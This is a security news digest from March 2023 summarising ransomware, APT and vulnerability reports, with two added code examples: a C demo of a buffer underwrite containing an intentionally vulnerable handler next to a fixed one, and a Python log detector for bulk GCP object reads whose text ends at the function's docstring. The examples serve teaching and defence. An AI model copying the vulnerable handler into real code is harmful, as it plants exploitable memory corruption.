The recently discovered Windows ransomware IceFire now also targets Linux enterprise networks in multiple sectors. SentinelLabs researchers discovered new Linux versions of the recently discovered IceFire ransomware that was employed in attacks against...Security Affairs
March 9, 2023 – Criminals
Researchers Uncover Email Threats From Exotic Lily Full Text
Abstract
Exotic Lily is an initial access broker that specializes in gathering credentials from high-value targets through employee impersonation, deep open-source intelligence (OSINT), and by creating convincing malicious documents.Cyware
March 09, 2023 – Hacker
Iranian Hackers Target Women Involved in Human Rights and Middle East Politics Full Text
Abstract
Iranian state-sponsored actors are continuing to engage in social engineering campaigns targeting researchers by impersonating a U.S. think tank. "Notably the targets in this instance were all women who are actively involved in political affairs and human rights in the Middle East region," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The cybersecurity company attributed the activity to a hacking group it tracks as Cobalt Illusion, and which is also known by the names APT35, Charming Kitten, ITG18, Phosphorus, TA453, and Yellow Garuda. The targeting of academics, activists, diplomats, journalists, politicians, and researchers by the threat actor has been well-documented over the years. The group is suspected to be operating on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC) and has exhibited a pattern of using fake personas to establish contact with individuals who are of strategic interest to the governmenThe Hacker News
March 9, 2023 – Criminals
8220 Gang used new ScrubCrypt crypter in recent cryptojacking attacks Full Text
Abstract
A threat actor tracked as 8220 Gang has been spotted using a new crypter called ScrubCrypt in cryptojacking campaigns. Fortinet researchers observed the mining group 8220 Gang using a new crypter called ScrubCrypt in cryptojacking attacks. "Between...Security Affairs
March 9, 2023 – Hacker
Russian TA499 Targets North American and European Countries Full Text
Abstract
The Russia-linked threat actor TA499 has been aggressively conducting email campaigns targeting high-profile European and North American government officials and CEOs of reputable organizations. The attack begins with an email or phone call in which the actor masquerades as a prominent political figure. The phone call...Cyware
March 09, 2023 – Cryptocurrency
New ScrubCrypt Crypter Used in Cryptojacking Attacks Targeting Oracle WebLogic Full Text
Abstract
The infamous cryptocurrency miner group called 8220 Gang has been observed using a new crypter called ScrubCrypt to carry out cryptojacking operations. According to Fortinet FortiGuard Labs, the attack chain commences with successful exploitation of susceptible Oracle WebLogic servers to download a PowerShell script that contains ScrubCrypt. Crypters are a type of software that can encrypt, obfuscate, and manipulate malware with the goal of evading detection by security programs. ScrubCrypt, which is advertised for sale by its author, comes with features to bypass Windows Defender protections as well as check for the presence of debugging and virtual machine environments. "ScrubCrypt is a crypter used to secure applications with a unique BAT packing method," security researcher Cara Lin said in a technical report. "The encrypted data at the top can be split into four parts using backslash '\.'" The crypter, in the final stage, decodes and loads theThe Hacker News
March 9, 2023 – Vulnerabilities
CloudBees flaws in Jenkins server can lead to code execution Full Text
Abstract
CloudBees vulnerabilities in the Jenkins open-source automation server can be exploited to achieve code execution on targeted systems. Researchers from cloud security firm Aqua discovered a chain of two vulnerabilities in the Jenkins open-source automation...Security Affairs
March 9, 2023 – General
Threat vectors converging, increasing damage Full Text
Abstract
The threat intelligence vendor Flashpoint warned that threat actors are increasingly combining known vulnerabilities, stolen credentials, and exposed data to wreak maximum damage.Cyware
March 09, 2023 – Vulnerabilities
New Critical Flaw in FortiOS and FortiProxy Could Give Hackers Remote Access Full Text
Abstract
Fortinet has released fixes to address 15 security flaws, including one critical vulnerability impacting FortiOS and FortiProxy that could enable a threat actor to take control of affected systems. The issue, tracked as CVE-2023-25610, is rated 9.3 out of 10 for severity and was internally discovered and reported by its security teams. "A buffer underwrite ('buffer underflow') vulnerability in FortiOS and FortiProxy administrative interface may allow a remote unauthenticated attacker to execute arbitrary code on the device and/or perform a DoS on the GUI, via specifically crafted requests," Fortinet said in an advisory. A buffer underwrite (CWE-124) is a write to memory before the start of a buffer, typically because an offset derived from untrusted input ends up negative or wraps around; the read-side counterpart, a buffer under-read, leaks whatever sits in front of the buffer instead. Either way the bug touches memory the allocator placed next to the buffer, which is why such flaws can be driven to unpredictable behavior, a crash, or arbitrary code execution. Fortinet said it's notThe Hacker News
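To make the bug class concrete, here is an added C example; it is not Fortinet's code, and the message format (a constructed <len><pad><text> record) is an assumption made for the demo. A handler copies the text into a fixed field and then truncates it by writing a NUL byte 'pad' positions back from the end. When the attacker-supplied pad exceeds len, the computed index goes negative (with size_t arithmetic it would wrap to a huge value instead) and the write lands in front of the field: a buffer underwrite. The harness places a canary region immediately before the field so the out-of-bounds write can be observed, and the hardened version shows the check that prevents it.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_LEN 16   /* fixed-size destination field, NUL-terminated */
#define GUARD_LEN 16   /* canary bytes placed in front of the field */

/* Constructed message format (not Fortinet's): <len><pad><len bytes of text>.
 * The handler copies the text into the field, then truncates it by writing a
 * NUL 'pad' bytes back from the end: field[len - pad] = 0.
 * If pad > len the index is negative and the write lands *before* the field. */

/* Vulnerable: pad is attacker-controlled and never compared with len. */
int trim_field_unsafe(char *field, const unsigned char *msg, size_t msg_len) {
    if (msg_len < 2) return -1;
    int len = msg[0], pad = msg[1];
    if (len > FIELD_LEN - 1 || msg_len < 2 + (size_t)len) return -1;
    memcpy(field, msg + 2, (size_t)len);
    field[len] = '\0';
    field[len - pad] = '\0';      /* buffer underwrite when pad > len */
    return 0;
}

/* Hardened: validate the relation before using it as an offset. */
int trim_field_safe(char *field, const unsigned char *msg, size_t msg_len) {
    if (msg_len < 2) return -1;
    int len = msg[0], pad = msg[1];
    if (len > FIELD_LEN - 1 || msg_len < 2 + (size_t)len) return -1;
    if (pad > len) return -2;     /* reject rather than compute a bad offset */
    memcpy(field, msg + 2, (size_t)len);
    field[len] = '\0';
    field[len - pad] = '\0';
    return 0;
}

/* Harness: lay out [guard | field] inside one array, fill the guard with 0xAA,
 * run the handler and count guard bytes that changed. Keeping guard and field
 * in a single object keeps the demonstration well-defined C while still
 * showing the write landing outside the field. Returns the handler's rc;
 * copies the field into out and the clobbered-byte count into *guard_clobbered. */
int run_trim(int (*handler)(char *, const unsigned char *, size_t),
             const unsigned char *msg, size_t msg_len,
             char *out, int *guard_clobbered) {
    unsigned char region[GUARD_LEN + FIELD_LEN];
    memset(region, 0xAA, sizeof region);
    char *field = (char *)region + GUARD_LEN;
    field[0] = '\0';
    int rc = handler(field, msg, msg_len);
    int n = 0;
    for (int i = 0; i < GUARD_LEN; i++)
        if (region[i] != 0xAA) n++;
    *guard_clobbered = n;
    memcpy(out, field, FIELD_LEN);
    return rc;
}

int main(void) {
    /* Constructed inputs: a well-formed record and one with pad > len. */
    static const unsigned char ok[]  = {5, 2, 'h', 'e', 'l', 'l', 'o'};
    static const unsigned char bad[] = {3, 5, 'a', 'b', 'c'};
    char out[FIELD_LEN];
    int clob, rc;
    rc = run_trim(trim_field_unsafe, ok, sizeof ok, out, &clob);
    printf("unsafe/ok : rc=%d field=\"%s\" guard bytes clobbered=%d\n", rc, out, clob);
    rc = run_trim(trim_field_unsafe, bad, sizeof bad, out, &clob);
    printf("unsafe/bad: rc=%d guard bytes clobbered=%d\n", rc, clob);
    rc = run_trim(trim_field_safe, bad, sizeof bad, out, &clob);
    printf("safe/bad  : rc=%d guard bytes clobbered=%d\n", rc, clob);
    return 0;
}
```

In a real allocator layout the bytes in front of the field would be heap metadata or another object rather than a canary, which is exactly what turns a one-byte underwrite into a crash or a controlled corruption. The fix is the ordering of operations: compare the untrusted values first, and only then derive an offset from them.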
March 9, 2023 – Breach
China-Linked UNC4540 Hackers Infect Unpatched SonicWall Appliances With Info-Stealer Full Text
Abstract
Suspected Chinese cybercriminals have zeroed in on unpatched SonicWall gateways and are infecting the devices with credential-stealing malware that persists through firmware upgrades, according to Mandiant.Cyware
March 9, 2023 – Business
Cado Security Banks $20M in Series B Funding Full Text
Abstract
The London-based company said Series B financing was led by Eurazeo, a French investment and asset management firm. Ten Eleven Ventures, a prior backer, also expanded its equity stake.Cyware
March 8, 2023 – Malware
Qakbot Strikes Again With New Delivery Method; Puts Millions of Devices at Risk Full Text
Abstract
Researchers at Trellix Advanced Research Center have detected various campaigns that use OneNote documents to distribute Qakbot and other malware such as AsyncRAT, IcedID, and XWorm.Cyware
March 08, 2023 – Vulnerabilities
Jenkins Security Alert: New Security Flaws Could Allow Code Execution Attacks Full Text
Abstract
A pair of severe security vulnerabilities have been disclosed in the Jenkins open source automation server that could lead to code execution on targeted systems. The flaws, tracked as CVE-2023-27898 and CVE-2023-27905, impact the Jenkins server and Update Center, and have been collectively christened CorePlague by cloud security firm Aqua. All Jenkins versions prior to 2.319.2 are vulnerable and exploitable. "Exploiting these vulnerabilities could allow an unauthenticated attacker to execute arbitrary code on the victim's Jenkins server, potentially leading to a complete compromise of the Jenkins server," the company said in a report shared with The Hacker News. The shortcomings are the result of how Jenkins processes plugins available from the Update Center, thereby potentially enabling a threat actor to upload a plugin with a malicious payload and trigger a cross-site scripting (XSS) attack. "Once the victim opens the ' Available PlugThe Hacker News
March 8, 2023 – Vulnerabilities
A critical flaw affects Fortinet FortiOS and FortiProxy, patch it now! Full Text
Abstract
Fortinet addressed a critical heap buffer underflow vulnerability affecting FortiOS and FortiProxy, which can lead to arbitrary code execution. Fortinet addressed a critical buffer underwrite ('buffer underflow') vulnerability, tracked as CVE-2023-25610...Security Affairs
March 8, 2023 – Hacker
Sharp Panda Targets Southeast Asian Governments Using Evolved Soul Malware Framework Full Text
Abstract
The campaign uses spear-phishing emails for initial access, carrying malicious documents with government-themed lures. It further deploys the RoyalRoad RTF kit, which exploits older Microsoft Office (Equation Editor) vulnerabilities for further infection.Cyware
March 08, 2023 – Solution
Syxsense Platform: Unified Security and Endpoint Management Full Text
Abstract
As threats grow and attack surfaces get more complex, companies continue to struggle with the multitude of tools they utilize to handle endpoint security and management. This can leave gaps in an enterprise's ability to identify devices that are accessing the network and in ensuring that those devices are compliant with security policies. These gaps are often seen in outdated spreadsheets that are used to track and manage asset inventory, configurations, vulnerabilities, and more. Ultimately, this increases organizational risk while stifling efficiency and productivity. That's why unified security and endpoint management has gained ground, as noted in Gartner's Hype Cycle for Endpoint Security, 2022 . As part of the market's need to gain a clearer, real-time picture of their devices and security posture, Syxsense launched its Enterprise platform last year to address the three key elements of endpoint management and security: vulnerabilities, patch, and compliance. AcThe Hacker News
March 8, 2023 – Vulnerabilities
Veeam warns to install patches to fix a bug in its Backup & Replication product Full Text
Abstract
Veeam addressed a high-severity vulnerability in the Backup Service that impacts Backup & Replication software. Veeam addressed a high-severity vulnerability in the Backup Service, tracked as CVE-2023-27532 (CVSS v3 score: 7.5), that impacts...Security Affairs
March 8, 2023 – Malware
SYS01 Campaign Uses Multiple Attack Evasion Tactics; Stayed Invisible for Five Months Full Text
Abstract
Morphisec researchers have been tracking this info-stealer since November 2022. This campaign uses lures and loading tactics similar to another info-stealer named S1deload, however, the final payload delivered is different.Cyware
March 08, 2023 – Criminals
Lazarus Group Exploits Zero-Day Vulnerability to Hack South Korean Financial Entity Full Text
Abstract
The North Korea-linked Lazarus Group has been observed weaponizing flaws in an undisclosed software product to breach a financial business entity in South Korea twice within a span of a year. While the first attack in May 2022 entailed the use of a vulnerable version of a certificate software that's widely used by public institutions and universities, the re-infiltration in October 2022 involved the exploitation of a zero-day in the same program. Cybersecurity firm AhnLab Security Emergency Response Center (ASEC) said it's refraining from mentioning the software owing to the fact that "the vulnerability has not been fully verified yet and a software patch has not been released." The adversarial collective, after obtaining an initial foothold by an unknown method, abused the zero-day bug to perform lateral movement, shortly after which the AhnLab V3 anti-malware engine was disabled via a BYOVD attack. It's worth noting here that the Bring Your Own Vulnerable DrThe Hacker News
March 8, 2023 – APT
North Korea-linked Lazarus APT used a 0-day in a recent attack Full Text
Abstract
North Korea-linked Lazarus APT group exploits a zero-day vulnerability in attacks aimed at a South Korean financial entity. ASEC (AhnLab Security Emergency Response Center) observed North Korea-linked Lazarus APT group exploiting a zero-day vulnerability...Security Affairs
March 8, 2023 – Breach
Netherlands: Qilin Ransomware Breaches Elderly Care Facility and Leaks Confidential Data Online Full Text
Abstract
The attack occurred on February 17, causing technical difficulties for the facility. The care institution announced the breach via its website and attributed the problem to a group that had gained unauthorized access to its network.Cyware
March 08, 2023 – Attack
Sharp Panda Using New Soul Framework Version to Target Southeast Asian Governments Full Text
Abstract
High-profile government entities in Southeast Asia are the target of a cyber espionage campaign undertaken by a Chinese threat actor known as Sharp Panda since late last year. The intrusions are characterized by the use of a new version of the Soul modular framework, marking a departure from the group's attack chains observed in 2021. Israeli cybersecurity company Check Point said the "long-running" activities have historically singled out countries such as Vietnam, Thailand, and Indonesia. Sharp Panda was first documented by the firm in June 2021, describing it as a "highly-organized operation that placed significant effort into remaining under the radar." Interestingly, the use of the Soul backdoor was detailed by Broadcom's Symantec in October 2021 in connection to an unattributed espionage operation targeting defense, healthcare, and ICT sectors in Southeast Asia. The implant's origins, according to research published by Fortinet FortiGThe Hacker News
March 8, 2023 – Government
CISA adds three new bugs to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added actively exploited flaws in Teclib GLPI, Apache Spark, and Zoho ManageEngine ADSelfService Plus to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities...Security Affairs
March 8, 2023 – Attack
Update: Israel blames state-sponsored Iranian hackers for ransomware attack on university Full Text
Abstract
The attack in February forced the Israel Institute of Technology (Technion) to postpone exams and shut down its IT systems. The incident followed what Israeli defense officials said were dozens of attempted Iranian cyberattacks over the past year.Cyware
March 08, 2023 – Government
CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is below:
- CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability
- CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability
- CVE-2022-28810 (CVSS score: 6.8) - Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability
The most critical of the three is CVE-2022-35914, which concerns a remote code execution vulnerability in the third-party library htmlawed present in Teclib GLPI, an open source asset and IT management software package. The exact specifics surrounding the nature of attacks are unknown, but the Shadowserver Foundation in October 2022 noted that it has seen exploitation attempts against its honeypots. Since then, a cURL-based one-line proof of concept (PoC) has been made aThe Hacker News
March 8, 2023 – APT
China-linked APT Sharp Panda targets government entities in Southeast Asia Full Text
Abstract
China-linked APT group Sharp Panda targets high-profile government entities in Southeast Asia with the Soul modular framework. Check Point researchers observed, in late 2022, a campaign attributed to the China-linked APT group Sharp Panda that is targeting...Security Affairs
March 8, 2023 – Government
US Senators Aim to Block Foreign Tech That Poses Threat Full Text
Abstract
Analysis in 2021 by The Citizen Lab concluded that TikTok collects types of data similar to what other social media platforms collect - and also said that "the general privacy standards for social platforms is not a high bar."Cyware
March 8, 2023 – Vulnerabilities
VMware NSX Manager bugs actively exploited in the wild since December Full Text
Abstract
Security researchers warn of hacking attempts in the wild exploiting critical vulnerabilities in VMware NSX Manager. Cyber security firm Wallarm is warning of ongoing attacks exploiting the critical flaws, tracked as CVE-2021-39144 (CVSS score of 9.8)...Security Affairs
March 8, 2023 – Outage
Northern Essex Community College Remains Shuttered After Cyberattack Full Text
Abstract
A spokesperson for the school told The Record that they did not know if the attack was ransomware, and claimed they “do not have evidence of any personal data being compromised.” On Tuesday, the school confirmed it would not open for the day.Cyware
March 8, 2023 – Vulnerabilities
Chrome 111 Patches 40 Vulnerabilities Full Text
Abstract
A total of 24 of the addressed security defects were reported by external researchers. These include eight high-severity flaws, 11 medium-severity bugs, and five low-severity issues.Cyware
March 8, 2023 – Vulnerabilities
Vulnerability in Toyota Management Platform Provided Access to Customer Data Full Text
Abstract
A severe vulnerability in the Toyota Customer 360 customer relationship management (CRM) platform allowed a security researcher to access the personal information of the car maker’s customers in Mexico.Cyware
March 7, 2023 – Malware
New SYS01stealer Threat Uses Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Morphisec has tracked an advanced info-stealer called SYS01stealer since November 2022. It uses similar lures and loading techniques to another information stealer recently named S1deload by Bitdefender, but the actual payload is different.Cyware
March 07, 2023 – Malware
SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors. "The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News. "The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information." The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler. However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actorsThe Hacker News
March 7, 2023 – General
Combating Ransomware: A Roadmap for Progress Full Text
Abstract
A new white paper from American University Washington College of Law’s Technology, Law, and Security Program considers how to combat the evolving ransomware threat in line with the Biden administration’s new National Cybersecurity Strategy.Lawfare
March 7, 2023 – Attack
SYS01 stealer targets critical government infrastructure Full Text
Abstract
Researchers discovered a new info stealer dubbed SYS01 stealer targeting critical government infrastructure and manufacturing firms. Cybersecurity researchers from Morphisec discovered a new, advanced information stealer, dubbed SYS01 stealer,...Security Affairs
March 7, 2023 – Criminals
Vice Society Ransomware Group Claims Hamburg University of Applied Sciences as Latest Victim Full Text
Abstract
The university warned that “significant amounts of data from various areas” were copied, including usernames and “cryptographically secured” passwords, email addresses, and mobile phone numbers.Cyware
March 07, 2023 – Hacker
Transparent Tribe Hackers Distribute CapraRAT via Trojanized Messaging Apps Full Text
Abstract
A suspected Pakistan-aligned advanced persistent threat (APT) group known as Transparent Tribe has been linked to an ongoing cyber espionage campaign targeting Indian and Pakistani Android users with a backdoor called CapraRAT. "Transparent Tribe distributed the Android CapraRAT backdoor via trojanized secure messaging and calling apps branded as MeetsApp and MeetUp," ESET said in a report shared with The Hacker News. As many as 150 victims, likely with military or political leanings, are estimated to have been targeted, with the malware (com.meetup.app) available to download from fake websites that masquerade as the official distribution centers of these apps. It is suspected that the targets are lured through a honeytrap romance scam wherein the threat actor approaches the victims via another platform and persuades them to install the malware-laced apps under the pretext of "secure" messaging and calling. However, the apps, besides offeringThe Hacker News
March 7, 2023 – Breach
Acer discloses a new data breach, 160 GB of sensitive data available for sale Full Text
Abstract
Taiwanese multinational hardware and electronics corporation Acer discloses a data breach after a threat actor claimed the hack of the company. Recently a threat actor announced the availability for sale of 160 GB of data allegedly stolen...Security Affairs
March 7, 2023 – Hacker
Transparent Tribe Lures Indian and Pakistani Officials With Romance Scam to Spread Malware Full Text
Abstract
ESET researchers have identified an active Transparent Tribe campaign, targeting mostly Indian and Pakistani Android users – presumably with a military or political orientation.Cyware
March 07, 2023 – General
Why Healthcare Can’t Afford to Ignore Digital Identity Full Text
Abstract
Investing in digital identity can improve security, increase clinical productivity, and boost healthcare's bottom line. — by Gus Malezis, CEO of Imprivata. Digitalization has created immeasurable opportunities for businesses over the past two decades. But the growth of hybrid work and expansion of Internet of Things (IoT) has outpaced traditional 'castle and moat' cybersecurity, introducing unprecedented vulnerabilities, especially in the healthcare industry. Although all organizations have important data to secure, healthcare holds some of the public's most sensitive personal health information (PHI) – not to mention insurance and financial data, as well. We all expect this information to be secured and protected, especially with HIPAA laws in place. However, due to increasing IT fragmentation and the growing sophistication of cyberattacks, this is no longer guaranteed. In fact, the number of individuals affected by health data breaches in the U.S. since 2009 isThe Hacker News
March 7, 2023 – Malware
Expert released PoC exploit code for critical Microsoft Word RCE flaw Full Text
Abstract
A security researcher released proof-of-concept exploit code for a critical flaw, tracked as CVE-2023-21716, in Microsoft Word. Security researcher Joshua Drake released a proof-of-concept for a critical vulnerability, tracked as CVE-2023-21716 (CVSS...Security Affairs
March 7, 2023 – Vulnerabilities
Android’s March 2023 Updates Patch Over 50 Vulnerabilities Full Text
Abstract
The most severe of the patched vulnerabilities are two remote code execution (RCE) flaws in the System component, both of which were addressed as part of the 2023-03-01 security patch level.Cyware
March 07, 2023 – Malware
Shein’s Android App Caught Transmitting Clipboard Data to Remote Servers Full Text
Abstract
An older version of Shein's Android application suffered from a bug that periodically captured and transmitted clipboard contents to a remote server. The Microsoft 365 Defender Research Team said it discovered the problem in version 7.9.2 of the app that was released on December 16, 2021. The issue has since been addressed as of May 2022. Shein, originally named ZZKKO, is a Chinese online fast fashion retailer based in Singapore. The app, which is currently at version 9.0.0, has over 100 million downloads on the Google Play Store. The tech giant said it's not "specifically aware of any malicious intent behind the behavior," but noted that the function isn't necessary to perform tasks on the app. It further pointed out that launching the application after copying any content to the device clipboard automatically triggered an HTTP POST request containing the data to the server "api-service[.]shein[.]com." To mitigate such privacy risks, GooThe Hacker News
March 7, 2023 – Insider Threat
LastPass hack caused by an unpatched Plex software on an employee’s PC Full Text
Abstract
The LastPass data breach was caused by the failure to update Plex on the home computer of one of the company's engineers. The security breach suffered by LastPass was caused by the failure to update Plex on the home computer of one of its engineers. Recently,...Security Affairs
March 7, 2023 – General
Exploitation of Critical Vulnerability in End-of-Life VMware Product Ongoing Full Text
Abstract
Tracked as CVE-2021-39144 (CVSS score of 9.8), the issue was disclosed in October 2022, when VMware announced patches for it, although the affected product had reached end-of-life (EOL) status in January 2022.Cyware
March 07, 2023 – Breach
LastPass Hack: Engineer’s Failure to Update Plex Software Led to Massive Data Breach Full Text
Abstract
The massive breach at LastPass was the result of one of its engineers failing to update Plex on their home computer, in what's a sobering reminder of the dangers of failing to keep software up-to-date. The embattled password management service last week revealed how unidentified actors leveraged information stolen from an earlier incident that took place prior to August 12, 2022, along with details "available from a third-party data breach and a vulnerability in a third-party media software package to launch a coordinated second attack" between August and October 2022. The intrusion ultimately enabled the adversary to steal partially encrypted password vault data and customer information. The second attack specifically singled out one of the four DevOps engineers, targeting their home computer with a keylogger malware to obtain the credentials and breach the cloud storage environment. This, in turn, is said to have been made possible by exploiting a nearly three-yThe Hacker News
March 7, 2023 – Breach
Hacker Claims to Sell 160GB Trove of Stolen Confidential Data From Acer Full Text
Abstract
The list of stolen data included confidential slides and presentations, technical manuals, Windows Imaging Format files, binaries of various types, backend infrastructure data, product model documentation, and information about various devices.Cyware
March 7, 2023 – Attack
RansomHouse Ransomware Attack Hit Hospital Clinic de Barcelona Full Text
Abstract
“The hospital’s press department said that all written work was being done on paper and that the hospital was diverting new urgent cases to other hospitals in the city,” states the Associated Press.Cyware
March 6, 2023 – APT
After Clasiopa, APT41 Targets Asian Materials Sector Full Text
Abstract
Symantec warned that the Chinese state-sponsored hacker group Winnti, aka APT41 and Blackfly, targeted two subsidiaries of an Asian conglomerate in the materials sector. The operation ran from late 2022 to early 2023, with a focus on intellectual property theft. Symantec has provided IOCs to de...Cyware
March 06, 2023 – Malware
New HiatusRAT Malware Targets Business-Grade Routers to Covertly Spy on Victims Full Text
Abstract
A previously unseen, complex malware strain has been targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America since at least July 2022. The elusive campaign, dubbed Hiatus by Lumen Black Lotus Labs, has been found to deploy two malicious binaries, a remote access trojan dubbed HiatusRAT and a variant of tcpdump that makes it possible to capture packets on the target device. "Once a targeted system is infected, HiatusRAT allows the threat actor to remotely interact with the system, and it utilizes prebuilt functionality [...] to convert the compromised machine into a covert proxy for the threat actor," the company said in a report shared with The Hacker News. "The packet-capture binary enables the actor to monitor router traffic on ports associated with email and file-transfer communications." The threat cluster primarily singles out end-of-life (EoL) DrayTek Vigor router models 2960 and 3900, with approximately 100The Hacker News
March 6, 2023 – Policy and Law
Where the New National Cybersecurity Strategy Differs From Past Practice Full Text
Abstract
Although the strategy builds on cybersecurity efforts from the previous three administrations, it departs from past perspectives and practices and, if fully implemented, has the potential to change the U.S. cybersecurity posture significantly for the better.Lawfare
March 6, 2023 – Attack
Ransom House ransomware attack hit Hospital Clinic de Barcelona Full Text
Abstract
Hospital Clinic de Barcelona, one of the main hospitals in the Spanish city, suffered a cyber attack that crippled its computer system. On Sunday, a ransomware attack hit the Hospital Clinic de Barcelona, one of the main hospitals of the Catalan city....Security Affairs
March 6, 2023 – Phishing
Digital Smoke: Massive Investment Fraud Scam Full Text
Abstract
Resecurity identified Digital Smoke, one of the largest investment scam networks, that has been defrauding netizens mostly from Europe, Asia, and Australia. The attackers impersonate Fortune 100 firms from the U.S. and the U.K. Most of the fraudulent schemes pertained to financial services, EV and ... Read MoreCyware
March 06, 2023 – Deepfake
From Disinformation to Deep Fakes: How Threat Actors Manipulate Reality Full Text
Abstract
Deep fakes are expected to become a more prominent attack vector. Here's how to identify them. What are Deep Fakes? A deep fake is the act of maliciously replacing real images and videos with fabricated ones to perform information manipulation. To create images, video and audio that are high quality enough to be used in deep fakes, AI and ML are required. Such use of AI, ML and image replacement are unlike other types of information manipulation, which use less extreme manipulation techniques, like misrepresentation of information, isolating parts of the information or editing it in a deceptive manner. Etay Maor, Senior Director of Security Strategy at Cato Networks adds "To add complications, the recent advancements and accessibility to AI generated text, such as GPT3, have already been used in combination with deepfakes (as a proof of concept) to create interactive, human looking conversation bots" What Do Deep Fakes Look Like? Deep fakes come in all shapes and sizThe Hacker News
March 6, 2023 – Criminals
European police dismantled the DoppelPaymer ransomware gang Full Text
Abstract
German police announced to have dismantled an international cybercrime gang behind the DoppelPaymer ransomware operation. Europol has announced that an international operation conducted by law enforcement in Germany and Ukraine, with help of the US FBI and the Dutch...Security Affairs
March 6, 2023 – Phishing
Multi-Year Spearphishing Campaign Against Maritime Industry Full Text
Abstract
EclecticIQ has revealed that a single connected threat cluster is most likely behind an attack campaign targeting the maritime industry with spearphishing emails to distribute different malware threats. In July 2022, the campaign shifted from Agent Tesla to Formbook using CAB file attachments. Howe ... Read MoreCyware
March 06, 2023 – Criminals
Core Members of DoppelPaymer Ransomware Gang Targeted in Germany and Ukraine Full Text
Abstract
Law enforcement authorities from Germany and Ukraine have targeted suspected core members of a cybercrime group that has been behind large-scale attacks using DoppelPaymer ransomware. The operation, which took place on February 28, 2023, was carried out with support from the Dutch National Police (Politie) and the U.S. Federal Bureau of Investigation (FBI), according to Europol. This encompassed a raid of a German national's house as well as searches in the Ukrainian cities of Kiev and Kharkiv. A Ukrainian national was also interrogated. Both individuals are believed to have taken up crucial positions in the DoppelPaymer group. "Forensic analysis of the seized equipment is still ongoing to determine the exact role of the suspects and their links to other accomplices," the agency further said . DoppelPaymer , according to cybersecurity firm CrowdStrike, emerged in April 2019 and shares most of its code with another ransomware strain known as BitPaymer, which is attriThe Hacker News
March 6, 2023 – Government
US government orders States to conduct cyber security audits of public water systems Full Text
Abstract
The US government urges cyber security audits of public water systems, highlighting the importance of securing US critical infrastructure. The Biden administration announced on Friday that it will make it mandatory for the states to conduct cyber security...Security Affairs
March 6, 2023 – Ransomware
LockBit Introduces New Method to Bypass MOTW Protection Full Text
Abstract
Researchers uncovered a new LockBit ransomware campaign last December and January using a novel technique involving the use of a .img container to bypass the Mark of The Web (MOTW) protection mechanism. LockBit remained one of the most active ransomware families in successful RaaS and extortion att ... Read MoreCyware
March 06, 2023
Experts Reveal Google Cloud Platform’s Blind Spot for Data Exfiltration Attacks Full Text
Abstract
Malicious actors can take advantage of "insufficient" forensic visibility into Google Cloud Platform (GCP) to exfiltrate sensitive data, new research has found. "Unfortunately, GCP does not provide the level of visibility in its storage logs that is needed to allow any effective forensic investigation, making organizations blind to potential data exfiltration attacks," cloud incident response firm Mitiga said in a report. The attack banks on the prerequisite that the adversary is able to gain control of an identity and access management (IAM) entity in the targeted organization by methods like social engineering to access the GCP environment. The crux of the problem is that GCP's storage access logs do not provide adequate transparency with regards to potential file access and read events, instead grouping them all as a single "Object Get" activity. "The same event is used for a wide variety of types of access, including: Reading a filThe Hacker News
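Because the storage data-access log records a metadata read and a full download as the same `storage.objects.get` event, the one signal a defender still has is volume: one principal touching many distinct objects in a short time. The detector below is an added example written for this page, not Mitiga's tooling or anything from Google; it assumes Cloud Audit Logs entries of the shape `gcloud logging read --format=json` returns, populates only the fields it reads (`timestamp`, `protoPayload.methodName`, `protoPayload.authenticationInfo.principalEmail`, `protoPayload.resourceName`), and the sample entries, principal names and thresholds are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timezone

WINDOW_SECONDS = 15 * 60      # fixed 15-minute buckets (tuning assumption)
MIN_DISTINCT_OBJECTS = 5      # alert threshold (tuning assumption)


def make_entry(ts, principal, bucket, obj):
    """Build a constructed Cloud Audit Logs data-access entry for storage.objects.get.

    Only the fields this detector reads are populated; real entries carry many more.
    """
    return {
        "timestamp": ts,
        "protoPayload": {
            "methodName": "storage.objects.get",
            "authenticationInfo": {"principalEmail": principal},
            "resourceName": f"projects/_/buckets/{bucket}/objects/{obj}",
        },
    }


# Constructed sample: a service account walks a bucket, a human reads one object.
SAMPLE_ENTRIES = [
    make_entry(f"2023-03-06T09:00:{5 * i:02d}Z",
               "svc-etl@example-project.iam.gserviceaccount.com",
               "finance-docs", f"q1/report-{i}.xlsx")
    for i in range(7)
] + [
    make_entry("2023-03-06T09:01:00Z", "alice@example.invalid", "finance-docs", "q1/report-0.xlsx"),
]


def _parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _split_resource(resource_name):
    # "projects/_/buckets/<bucket>/objects/<object>" -> (bucket, object)
    _, _, rest = resource_name.partition("/buckets/")
    bucket, _, obj = rest.partition("/objects/")
    return bucket, obj


def flag_bulk_object_reads(entries, window_seconds=WINDOW_SECONDS, min_objects=MIN_DISTINCT_OBJECTS):
    """Return {principal: {...}} for principals whose storage.objects.get calls touch
    at least `min_objects` distinct objects inside one time bucket.

    The log cannot say whether each call read bytes or only metadata, so this is a
    volume signal to triage, not proof of exfiltration.
    """
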